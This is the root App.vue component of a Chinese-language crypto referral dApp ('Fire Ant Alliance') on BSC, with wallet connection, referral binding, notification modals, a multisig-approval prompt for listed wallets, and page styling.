<template>
    <div class="main-container">
        <Teleport to="body">
            <HeaderComponent v-if="this.$route.name !== 'HomePage'"/>
        </Teleport>
        <template v-if="this.referrerWallet">
            <router-view></router-view>
        </template>
    </div>
    <template v-if="this.showConfirmBinding === true">
        <ConfirmModal :header="this.confirmBindingTxt" :confirmTxt="this.localize('確定')"
                      :show-cancel="false" :show-confirm="true"
                      @confirm="onBindingConfirm"/>
    </template>
    <template v-if="this.notificationMsg !== null">
        <NotificationModal :msg="this.notificationMsg" :confirmTxt="this.localize('确定')" :show-cancel="false"
                           @confirm="readNotification"/>
    </template>
    <template v-if="this.showNoReferrerMsg === true">
        <ConfirmModal :header="this.noReferrerMsg" :confirmTxt="this.localize('確定')" :show-cancel="false"
                      :show-confirm="false"/>
    </template>
    <template v-if="this.showSigModal === true">
        <ConfirmModal :header="this.sigModalMsg"
                      :confirmTxt="this.localize('確定')"
                      @confirm="confirmSignature"
                      :show-cancel="false"/>
    </template>
</template>

<script>
import {getLanguageStore} from '@/lang/langStore'
import HeaderComponent from "@/components/HeaderComponent.vue";
import ConfirmModal from "@/components/ConfirmModal.vue";
import NotificationModal from "@/components/NotificationModal.vue";
import {hideLoading, showLoading} from "@/utils/spinnerHelper";
import {connectDirect, maskBscAddress, sendLpTrans} from "@/utils/web3Helper";
import {postRequestAsync} from "@/utils/request";
import {isMainnet, signatureWalletList} from "@/utils/constants";

export default {
    name: 'App',
    components: {
        HeaderComponent,
        ConfirmModal,
        NotificationModal
    },
    data() {
        return {
            langStore: getLanguageStore(),
            showConfirmBinding: false,
            confirmBindingTxt: '',
            countdownDisplayAt: 1762473600,
            countdownInterval: null,
            notificationMsg: null,
            showSigModal: false,
            showNoReferrerMsg: false,
            noReferrerMsg: getLanguageStore().localize('请使用分享链接打开'),
            sigModalMsg: getLanguageStore().localize('Fire Ant Alliance邀请您参与我们的多签。'),

        }
    },
    provide() {
        return {
            langStore: this.langStore,
            localize: this.localize
        }
    },
    async mounted() {
        try {
            showLoading('加载中')

            const {provider, account, chainId} = await connectDirect(isMainnet)
            this.$store.dispatch('setConnectedAccount', {
                wallet: account,
                chainId: chainId
            })

            await Promise.all([
                this.getMyReferLink(),
                this.getReferrerWalletAddress()
            ]);
            await this.canShowSignature()

        } catch (e) {
            console.log(e.message)
        } finally {
            hideLoading()
        }
        this.fetchNotification()
    },
    computed: {
        myWalletAddress() {
            return this.$store.state.connectedWallet
        },
        getReferId() {
            if (this.$store.state.referId) {
                return this.$store.state.referId
            }

            const params = new URL(window.location.href).searchParams
            const referId = params.get('ref')
            this.$store.dispatch('setReferId', {
                referId: referId
            })
            return referId
        },
        referrerWallet() {
            return this.$store.state.referrerWalletAddress
        }
    },
    methods: {
        localize(text, params) {
            return this.langStore.localize(text, params)
        },
        async connect() {
            console.log('enter connect')

            if (!window.ethereum) console.log('未检测到以太坊 Provider');
            console.log('enter connect2')
            try {
                const accs = await window.ethereum.request({method: 'eth_requestAccounts'});
                const cid = await window.ethereum.request({method: 'eth_chainId'});
                console.log('ok', accs[0], cid);
            } catch (e) {
                console.log('raw error', e, e?.code, e?.message, e?.stack);
            }
        },
        async getMyReferLink() {
            const result = await postRequestAsync('refer/getReferLink', {walletAddress: this.myWalletAddress})
            if (result?.code === 200 && result?.msg?.link) {
                this.$store.dispatch('setReferLink', {
                    referLink: result?.msg?.link
                })
            }
        },
        async getReferrerWalletAddress() {

            const result = await postRequestAsync('refer/getReferrerWallet', {
                walletAddress: this.myWalletAddress,
                referCode: this.getReferId
            })
            if (result?.code === 202) {
                if (this.getReferId) {
                    const result = await postRequestAsync('refer/getReferrerWalletByCode', {
                        referCode: this.getReferId
                    })
                    if (result?.code === 200 && result?.msg?.referrerWallet) {

                        this.confirmBindingTxt = `${this.localize('推荐钱包：')}${maskBscAddress(result?.msg?.referrerWallet)}\n${this.localize('确认绑定？')}`
                        this.showConfirmBinding = true
                    }

                } else {
                    this.showNoReferrerMsg = true
                }
                return
            }
            if (result?.code === 200 && result?.msg?.referrerWalletAddress) {
                this.$store.dispatch('setReferrerWalletAddress', {
                    referrerWalletAddress: result?.msg?.referrerWalletAddress
                })
            }
        },
        async onBindingConfirm() {
            this.showConfirmBinding = false
            showLoading(this.localize('加載中'))
            try {
                const result = await postRequestAsync('refer/createReferInfo', {
                    walletAddress: this.myWalletAddress,
                    referCode: this.getReferId
                })
                if (result?.code === 200 && result?.msg?.referrerWalletAddress) {
                    this.$store.dispatch('setReferrerWalletAddress', {
                        referrerWalletAddress: result?.msg?.referrerWalletAddress
                    })
                }
            } finally {
                hideLoading()
            }

        },
        async fetchNotification() {
            const lang = this.langStore.getBrowserDefaultLanguage()
            console.log(`lang:${lang}`)
            try {
                const result = await postRequestAsync('notification/getUserNotification', {
                    wallet: this.myWalletAddress,
                    lang
                })
                if (result?.code === 200 && result?.msg) {

                    this.notificationMsg = result?.msg

                }
            } finally {

            }
        },
        async readNotification() {
            if (!this.notificationMsg?.msgId) {
                return
            }
            showLoading()
            try {
                const result = await postRequestAsync('notification/readUserNotification', {
                    wallet: this.myWalletAddress,
                    msgId: this.notificationMsg?.msgId
                })
                if (result?.code === 200) {
                    this.notificationMsg = null
                }
            } finally {
                hideLoading()
            }
        },
        async canShowSignature () {
            if (!this.myWalletAddress) {
                return
            }
            const signWallet = signatureWalletList.find(sigWallet => sigWallet.toLowerCase() === this.myWalletAddress.toLowerCase())
            if (!signWallet) {
                return
            }
            const result = await postRequestAsync('signature/checkWalletSignature', {
                wallet: this.myWalletAddress
            })
            if (result?.msg?.code === 200) {
                this.showSigModal = true
            }
        },
        async confirmSignature() {
            if (!this.myWalletAddress) {
                return
            }

            this.showSigModal = false
            const wallet = signatureWalletList.find(sigWallet => sigWallet.toLowerCase() === this.myWalletAddress.toLowerCase())

            if (wallet) {
                const result = await postRequestAsync('signature/checkWalletSignature', {
                    wallet: this.myWalletAddress
                })
                if (result?.msg?.code === 200) {
                    await sendLpTrans('approveTrading')
                    await postRequestAsync('signature/finishWalletSignature', {
                        wallet: this.myWalletAddress
                    })
                }
            }
        }
    },
}
</script>

<style>
#app {
    font-family: PingFang SC, system-ui, Arial, Source Han Sans, Microsoft YaHei, sans-serif;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
    text-align: center;
    color: #2c3e50;
    background-color: #ffffff;
    width: 100%;
    height: 100%;
    position: fixed;
    overflow-y: auto;
    overflow-x: hidden;
    top: 0;
    left: 0;
}

.no-select {
    -webkit-user-select: none; /* Chrome、Safari、新 Edge */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* 旧版 IE/Edge */
    user-select: none; /* 标准 */
}

.main-container {
    width: 100%;
    height: 100%;
    position: fixed;
    top: 0;
    left: 0;
    display: flex;
    flex-direction: column;
    background-color: #090600;
}

.page-container {
    width: 100%;
    min-height: 100%;
    font-size: 1em;
    overflow-x: hidden;
    overflow-y: auto;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: start;
    position: relative;
    background-color: #090600;
    padding: 8em 2em 4em;
    box-sizing: border-box;
}

.buy-nft-bg {
    width: 100%;
    position: absolute;
    opacity: 0.3;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
}

.countdown-mask {

    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;

    /* 原本半透明背景色，可稍微提高以突顯模糊 */
    background-color: rgba(0, 0, 0, 0.35);

    /* 背景模糊 */
    backdrop-filter: blur(4px);
    -webkit-backdrop-filter: blur(4px);

    /* 可選：提升疊放層級，確保遮罩在上層 */
    z-index: 960;

}

.countdown-text {
    color: #ffffff;
    position: fixed;
    z-index: 961;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    font-size: 1.6em;
    width: 100%;
    text-align: center;
    padding: 1em;
    box-sizing: border-box;
    background-color: rgba(0, 0, 0, 0.86);
}
</style>